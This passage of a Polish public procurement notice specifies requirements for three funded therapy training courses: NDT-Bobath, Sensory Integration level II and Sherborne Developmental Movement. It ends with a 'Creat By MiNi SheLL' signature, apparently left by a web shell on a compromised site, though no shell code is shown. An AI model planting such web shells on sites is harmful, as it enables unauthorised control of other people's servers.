a)	wykwalifikowaną kadrę tj. instruktorów posiadających numerowany certyfikat zgodny z przepisami EBTA (European Bobath Tutors Association z siedzibą w Londynie), potwierdzony przez Polskie Stowarzyszenie Terapeutów NDT-Bobath i Polskie Towarzystwo Fizjoterapii (PTF), instruktorzy powinni być członkami Polskiego Stowarzyszenia NDT-Bobath jedynej w Polsce  instytucji odpowiedzialnej za stronę merytoryczną kursów i szkoleń z zakresu usprawniania Metodą NDT-Bobath, a także uprawnioną do propagowania informacji dotyczących metody oraz do używania znaku NDT-Bobath, oraz powinni posiadać doświadczenie merytoryczne i dydaktyczne, tj. ukończyli specjalistyczne kursy z zakresu NDT-Bobath Basic, NDT- Bobath Baby, oraz NDT- Baby Advanced i obecnie pracują tą metodą, zorganizowali i przeprowadzili co najmniej 3 kursy w zakresie NDT-Bobath Basic. 
b)	przygotowanie oraz rozdanie uczestnikowi niezbędnych materiałów szkoleniowych i piśmienniczych oraz przekazanie 1 kompletu  materiałów szkoleniowych do dokumentacji Projektu,
c)	Wykonawca będzie prowadził dokumentację kursu, tj.
-dzienniki zajęć edukacyjnych zawierające listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
-imienne listy odbioru materiałów szkoleniowych oraz odbioru posiłków,
-dokumentację fotograficzną z przeprowadzonych zajęć,
             Oryginały dokumentacji szkolenia zostaną przekazane Zamawiającemu.
d)	 materiały, urządzenia potrzebne do realizacji szkolenia zapewnia Wykonawca,
e)	Wykonawca sporządzi i przekaże Zamawiającemu przed podpisaniem umowy w sprawie zamówienia publicznego: harmonogram kursu obejmujący jego nazwę i zakres, czas trwania, plan nauczania określający tematy zajęć, ich wymiar, oraz zgodę EBTA (European Bobath Tutors Association z siedziba w Londynie), na przeprowadzenie kursu w Polsce w 2014 roku ze wskazaniem ośrodka, w którym będzie realizowany  kurs,
f)	warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi w zakresie BHP i p.poż. Sale wykładowe powinny być przystosowane do prowadzenia zajęć dydaktycznych, wyposażone w niezbędne pomoce dydaktyczne (np. tablica, projektor, rzutnik obrazu, itp.),
g)	dokumentacja szkoleniowa, zaświadczenia, materiały szkoleniowe oraz sala szkoleniowa - powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Współpracy Transgranicznej Polska-Białoruś-Ukraina 2007 - 2013,
h)	Wykonawca ubezpieczy uczestnika kursu od następstw nieszczęśliwych wypadków w związku z kursem,
i)	Wykonawca zobowiązuje się do zwrotu kosztów dojazdu uczestnika na zajęcia w ramach kursu na terenie całego kraju. Kwota będzie rozliczana na podstawie delegacji,
j)	wymagany zakres merytoryczny kursu/szkolenia powinien obejmować m.in.:
-zapoznanie uczestników z podstawowymi pojęciami, które stanowią podstawę koncepcji Bobath,
-omówienie aktualnej wiedzy z neuro-anatomii, neurofizjologii i neurologii w aspekcie dziecka z mózgowym porażeniem dziecięcym,
-pokazanie interdyscyplinarnego charakteru oceny i leczenia pacjentów z wykorzystaniem koncepcji Bobath,
-zaznanie z aktualnym podejściem do koncepcji Bobath. Sposobem leczenia dzieci z mózgowym porażeniem dziecięcym i innymi schorzeniami wymagającymi interwencji rehabilitacyjnej w oparciu o najnowsze badania z zakresu neurobiologii, klasyfikacji, zasad oceny i leczenia,
-praktyczne zapoznanie uczestnika i zdobycie doświadczenia klinicznego w postępowaniu, ocenie i prowadzeniu terapii z pacjentami z MPDz oraz schorzeniami narządu ruchu,
-poznanie prawidłowego i nieprawidłowego rozwoju dziecka,
-zapoznanie ze skutkami nieprawidłowego rozwoju dziecka zagrożonego porażeniem mózgowym, ze stwierdzonym porażeniem mózgowym oraz innymi zaburzeniami w rozwoju psycho - motorycznym występującymi u dzieci.

2.	Miejsce realizacji kursu:
Teren całej Polski ze względu na specjalistyczny charakter kursu.

3.	 Materiały dydaktyczne dla uczestnika:
Wykonawca zobowiązany jest przygotować w formie drukowanej i elektronicznej materiały szkoleniowe o treści adekwatnej do omawianej tematyki oraz materiały piśmiennicze (notes, długopis). Wszelkie materiały, które otrzyma uczestnik kursu Wykonawca zobowiązany jest oznakować zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007 - 2013. Materiały w formie drukowanej muszą być trwale połączone ze sobą (np. bindowane, zszyte, oprawione). 

4.	Kurs musi zostać przeprowadzony zgodnie z:
a)	programem szkolenia przedstawionym przez Wykonawcę oraz przepisami EBTA (European Bobath Tutors Association)
b)	 zapisami wskazanymi w niniejszym Szczegółowym Opisie Przedmiotu Zamówienia.

5.	Kurs musi zakończyć się wydaniem przez instytucję szkolącą zaświadczenia/certyfikatu o jego ukończeniu:
-po pomyślnym zdaniu egzaminów teoretycznych i praktycznych uczestnik otrzyma numerowany certyfikat zgodny z przepisami EBTA (European Bobath Tutors Association) ukończenia Kursu Podstawowego NDT-Bobath i nabywa prawo do używania tytułu: Certyfikowanego Terapeuty NDT - Bobath oraz uprawnienia do dalszego szkolenia w tej metodzie.
-jeśli uczestnik kursu nie przystąpi do egzaminu końcowego lub go nie zda otrzyma zaświadczenie o odbyciu kursu bez prawa używania tytułu Terapeuta NDT-Bobath.

6.	Zakwaterowanie i wyżywienie:
W trakcie realizacji kursu Wykonawca musi zapewnić uczestnikowi zakwaterowanie oraz całodobowe wyżywienia.  

Zakwaterowanie uczestnika kursu obejmuje:
-nocleg wraz ze śniadaniem w obiekcie w którym będzie prowadzony kurs lub w gospodarstwie agroturystycznym/pensjonacie/hotelu/hostelu w miejscowości, gdzie będzie realizowany kurs lub odległym od danej miejscowości nie dalej niż 10 km, przez cały okres realizacji kursu, tj. 53 dni, 
-pokój 1-osobowy lub 2- osobowy do wykorzystania przez 1 osobę  o podstawowym standardzie i wyposażeniu wraz z samodzielnym węzłem sanitarnym oraz dostępem do telewizji i Internetu. 

Wyżywienie dla uczestnika kursu obejmuje: 
-zapewnienie dwudaniowego obiadu z deserem i napojami (kawa, herbata, woda mineralna, soki owocowe),  
-zapewnienie kolacji,
-wyżywienie będzie zagwarantowane przez cały okres realizacji kursu, tj. 53 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część 2 zamówienia - Organizacja i przeprowadzenie kursu Integracja Sensoryczna - II stopnia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 zamówienia - Organizacja i przeprowadzenie kursu Integracja Sensoryczna - II stopnia.
1.	Czas trwania i sposób organizacji kursu:
1)	kurs Integracja Sensoryczna - II stopnia zostanie zrealizowany w terminie od dnia zawarcia umowy Zamawiającego z Wykonawcą maksymalnie do dnia 31 marca 2015 r.,
2)	w kursie będzie brała udział jedna osoba, na którą będzie przypadało 140 godz. zajęć teoretycznych i praktycznych (1 godz. kursu=45 min.),
3)	wyżej wymieniona liczba godzin powinna być wykonana w ciągu  nie dłuższym niż 20 dni,
4)	w ramach wykonania usługi Wykonawca zapewni:
-wykwalifikowaną kadrę, tj.  dwóch certyfikowanych instruktorów SI, lub jeden senior instruktor SI Polskiego Towarzystwa Integracji Sensorycznej (PTIS), członek Polskiego Towarzystwa Integracji Sensorycznej, w tym instruktor-fizjoterapeuta, instruktorzy powinni posiadać  kwalifikacje oraz doświadczenie merytoryczne i dydaktyczne zdobyte podczas  przeprowadzenia min.  5 kursów SI I stopnia oraz min. 5 kursów SI II stopnia w zakresie zgodnym z tematyką kursu oraz wytycznymi Polskiego Towarzystwa Integracji Sensorycznej.
-zapewnienie dla uczestnika niezbędnych materiałów szkoleniowych i piśmienniczych (przygotowanie i przekazanie materiałów)  oraz przekazanie 1 kompletu  materiałów szkoleniowych do dokumentacji projektu,
5)	Wykonawca będzie prowadził dokumentację kursu, tj.:
-dzienniki zajęć edukacyjnych zawierające listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
-imienne listy odbioru materiałów szkoleniowych oraz odbioru posiłków,
-dokumentację fotograficzną z przeprowadzonych zajęć.
         Oryginały dokumentacji szkolenia zostaną przekazane Zamawiającemu.
6)	materiały, urządzenia potrzebne do realizacji szkolenia zapewnia Wykonawca,
7)	 Wykonawca sporządzi i przekaże Zamawiającemu przed podpisaniem umowy w sprawie zamówienia publicznego: harmonogram kursu obejmujący jego nazwę i zakres, czas trwania, plan nauczania określający tematy zajęć zgodny z wytycznymi Polskiego Towarzystwa Integracji Sensorycznej oraz zgodę Polskiego Towarzystwa Integracji Sensorycznej na przeprowadzenie kursu w Polsce w 2014 i 2015 roku ze wskazaniem ośrodka, w którym będzie realizowany  kurs, 
8)	warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi w zakresie BHP i p. poż. Sale wykładowe powinny być przystosowane do prowadzenia zajęć dydaktycznych, wyposażone w niezbędne pomoce dydaktyczne (np. tablica, projektor, rzutnik obrazu, itp.),
9)	dokumentacja szkoleniowa, zaświadczenia, materiały szkoleniowe oraz sala szkoleniowa - powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Współpracy Transgranicznej Polska-Białoruś-Ukraina 2007 - 2013,
10)	Wykonawca ubezpieczy uczestnika kursu od następstw nieszczęśliwych wypadków w związku z kursem,
11)	Wykonawca zobowiązuje się do zwrotu kosztów dojazdu uczestnika na zajęcia w ramach kursu na terenie całego kraju. Kwota będzie rozliczana na podstawie delegacji,
12)	Wymagany zakres merytoryczny kursu powinien być zgodny z wytycznymi Polskiego Towarzystwa Integracji Sensorycznej (PTIS) i powinien obejmować m.in.:
-geneza i główne założenia metody integracji sensorycznej,
-główne założenia integracji sensorycznej (pryncypia z zakresu neurologii, psychologii klinicznej, psychologii wychowawczej, pedagogiki specjalnej),
-krótka charakterystyka 3 bazowych systemów sensorycznych (układ przedsionkowy, dotykowy, proprioceptywny) oraz odruchów ATOS, STOS, TOB,
-diagnoza i opracowanie wyników,
-układ nerwowy i systemy sensoryczne (przebieg procesów integracji sensorycznej w układzie nerwowym, główne centra procesów integracji Podstawowe dysfunkcje integracji sensorycznej,
-jak rozpoznać dziecko z zaburzeniami integracji sensorycznej? Symptomy dysfunkcji procesów SI, 
-pomoc dziecku z zaburzeniami SI - możliwości i ograniczenia w środowisku ucznia,
-terapia integracji sensorycznej - przebieg i zasady jej właściwego prowadzenia.

2.	Miejsce realizacji kursu:
Teren całej Polski ze względu na specjalistyczny charakter kursu.

3.	 Materiały dydaktyczne dla uczestnika:
Wykonawca zobowiązany jest przygotować w formie drukowanej i elektronicznej materiały szkoleniowe o treści adekwatnej do omawianej tematyki oraz materiały piśmiennicze (notes, długopis). Wszelkie materiały, które otrzyma uczestnik kursu Wykonawca zobowiązany jest oznakować zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007 - 2013. Materiały w formie drukowanej muszą być trwale połączone ze sobą (np. bindowane, zszyte, oprawione). 

4.	Kurs musi zostać przeprowadzony zgodnie z:
a)	programem szkolenia przedstawionym przez Wykonawcę i zgodnym z wytycznymi Polskiego Towarzystwa Integracji Sensorycznej (PTIS), 
b)	zapisami wskazanymi w niniejszym szczegółowym opisie przedmiotu zamówienia.

5.	Kurs musi zakończyć się wydaniem przez instytucję szkolącą zaświadczenia/certyfikatu o jego ukończeniu:
-po pomyślnym zdaniu egzaminów teoretycznych i praktycznych II stopnia uczestnik otrzyma certyfikat terapeuty Integracji Sensorycznej dający uprawnienia do diagnozowania i prowadzenia terapii integracji sensorycznej.
-jeśli uczestnik kursu nie przystąpi do egzaminu końcowego lub go nie zda otrzyma zaświadczenie o odbyciu kursu.

6.	Zakwaterowanie i wyżywienie
W trakcie realizacji kursu Wykonawca musi zapewnić uczestnikowi zakwaterowanie oraz całodobowe wyżywienia.  

Zakwaterowanie uczestnika kursu obejmuje:
-nocleg wraz ze śniadaniem w obiekcie w którym będzie prowadzony kurs lub w gospodarstwie agroturystycznym/pensjonacie/hotelu/hostelu w miejscowości, gdzie będzie realizowany kurs lub odległym od danej miejscowości nie dalej niż 10 km, przez cały okres realizacji kursu, tj. 20 dni, 
-pokój 1-osobowy lub 2- osobowy do wykorzystania przez 1 osobę  o podstawowym standardzie i wyposażeniu wraz z samodzielnym węzłem sanitarnym oraz dostępem do telewizji i Internetu. 

Wyżywienie dla uczestnika kursu obejmuje: 
-zapewnienie dwudaniowego obiadu z deserem i napojami (kawa, herbata, woda mineralna, soki owocowe),  
-zapewnienie kolacji,
-wyżywienie będzie zagwarantowane przez cały okres realizacji kursu, tj. 20 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część 3 zamówienia - Organizacja i przeprowadzenie kursu Metoda Ruchu Rozwijającego Weroniki Sherborne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 3 zamówienia - Organizacja i przeprowadzenie kursu Metoda Ruchu Rozwijającego Weroniki Sherborne.
1.Czas trwania i sposób organizacji szkolenia:
1)	kurs Metoda Ruchu Rozwijającego Weroniki Sherborne zostanie zrealizowany w terminie od dnia zawarcia umowy Zamawiającego z Wykonawcą maksymalnie do dnia 31 grudnia 2014 r.,
2)	w kursie będą brały udział dwie osoby, na każdą z nich  będzie przypadało 18 godz. zajęć teoretycznych i praktycznych (1 godz. kursu=45 min.),
3)	przewidywany okres trwania kursu: 2 dni,
4)	w ramach wykonania usługi Wykonawca zapewni:
a)	wykwalifikowaną kadrę, tj. liderów upoważnionych przez ISCO (International Sherborne Co-operation w Wielkiej Brytanii), osoby powinny posiadać  kwalifikacje oraz doświadczenie merytoryczne i dydaktyczne zdobyte podczas przeprowadzenia min. 5 kursów podstawowych (Basic Course-BC),poziom I i II krajowy,  
b)	przygotowanie oraz rozdanie uczestnikom i uczestniczkom niezbędnych materiałów szkoleniowych i piśmienniczych oraz przekazanie 1 kompletu  materiałów szkoleniowych do dokumentacji projektu,
c)	Wykonawca będzie prowadził dokumentację kursu, tj.
-dzienniki zajęć edukacyjnych zawierające listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
-imienne listy odbioru materiałów szkoleniowych oraz odbioru posiłków,
-dokumentację fotograficzną z przeprowadzonych zajęć.
              Oryginały dokumentacji szkolenia zostaną przekazane Zamawiającemu.
d)	materiały, urządzenia potrzebne do realizacji szkolenia zapewnia Wykonawca,
e)	Wykonawca sporządzi i przekaże Zamawiającemu przed podpisaniem umowy w sprawie zamówienia publicznego: harmonogram kursu obejmujący jego nazwę i zakres, czas trwania, plan nauczania określający tematy zajęć, ich wymiar ze wskazaniem ośrodka w którym będzie realizowany  kurs,
f)	warunki lokalowe, sale szkoleniowe, także w miejscu szkolenia praktycznego oraz wykorzystywany sprzęt muszą spełniać wymogi w zakresie BHP i p. poż. Sale wykładowe powinny być przystosowane do prowadzenia zajęć dydaktycznych, wyposażone w niezbędne pomoce dydaktyczne (np. tablica, projektor, rzutnik obrazu, itp.),
g)	dokumentacja szkoleniowa, zaświadczenia, materiały szkoleniowe oraz sala szkoleniowa - powinny być oznakowane zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Współpracy Transgranicznej Polska-Białoruś-Ukraina 2007 - 2013,
h)	Wykonawca ubezpieczy uczestników kursu od następstw nieszczęśliwych wypadków w związku z kursem,
i)	Wykonawca zobowiązuje się do zwrotu kosztów dojazdu uczestników na zajęcia w ramach kursu na terenie całego kraju. Kwota będzie rozliczana na podstawie delegacji. 
j)	Wymagany zakres merytoryczny szkolenia powinien być zgodny z ISCO (International Sherborne Co-operation w Wielkiej Brytanii) i  obejmować m.in.:
-Metoda Ruchu Rozwijającego bazującego na pracy Weroniki Sherborne to system różnorodnych doświadczeń ruchowych nastawionych na stymulowanie rozwoju dziecka, szczególnie sfery emocjonalnej i społecznej. Metoda ta jest stosowana zarówno w pracy z dziećmi, jak i młodzieżą oraz osobami dorosłymi. Podstawowe założenia metody Ruchu Rozwijającego dotyczą rozwijania świadomości własnego ciała, otaczającej przestrzeni, relacji społecznych.
-szkolenie ma za zadanie przekazać wiedzę i praktyczne doświadczenia w zakresie posługiwania się RUCHEM jako narzędziem wspomagania rozwoju psychoruchowego dziecka o prawidłowym rozwoju, jak i zastosowania MRR w terapii zaburzeń rozwojowych.

2.	Miejsce realizacji kursu:
Teren całej Polski ze względu na specjalistyczny charakter kursu.

3.	 Materiały dydaktyczne dla uczestników:
Wykonawca zobowiązany jest przygotować w formie drukowanej i elektronicznej materiały szkoleniowe o treści adekwatnej do omawianej tematyki oraz materiały piśmiennicze (notes, długopis). Wszelkie materiały, które otrzyma uczestnik kursu Wykonawca zobowiązany jest oznakować zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach Programu Współpracy Transgranicznej Polska - Białoruś - Ukraina 2007 - 2013. Materiały w formie drukowanej muszą być trwale połączone ze sobą (np. bindowane, zszyte, oprawione). 

4.	Kurs musi zostać przeprowadzony zgodnie z:
a)	programem szkolenia ISCO (International Sherborne Co-operation w Wielkiej Brytanii),
b)	zapisami wskazanymi w niniejszym szczegółowym opisie przedmiotu zamówienia.

5.	Kurs musi zakończyć się wydaniem przez instytucję szkolącą zaświadczeniem o jego ukończeniu
Po zakończonym kursie uczestnik otrzyma zaświadczenie o ukończeniu I stopnia kursu szkolenia według programu ISCO (International Sherborne Co-operation w Wielkiej Brytanii).

6.	Zakwaterowanie i wyżywienie:
W trakcie realizacji kursu Wykonawca musi zapewnić uczestnikom zakwaterowanie oraz całodobowe wyżywienia.  

Zakwaterowanie uczestnika kursu obejmuje:
-nocleg wraz ze śniadaniem w obiekcie w którym będzie prowadzony kurs lub w gospodarstwie agroturystycznym/pensjonacie/hotelu/hostelu w miejscowości, gdzie będzie realizowany kurs lub odległym od danej miejscowości nie dalej niż 10 km, przez cały okres realizacji kursu, tj. 2 dni, 
-pokój 1-osobowy lub 2-osobowy do wykorzystania przez 1 osobę                       o podstawowym standardzie i wyposażeniu wraz z samodzielnym węzłem sanitarnym oraz dostępem do telewizji i Internetu. 

Wyżywienie dla uczestników kursu obejmuje: 
-zapewnienie dwudaniowego obiadu z deserem i napojami (kawa, herbata, woda mineralna, soki owocowe),  
-zapewnienie kolacji,
-wyżywienie będzie zagwarantowane przez cały okres realizacji kursu, tj.2 dni..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com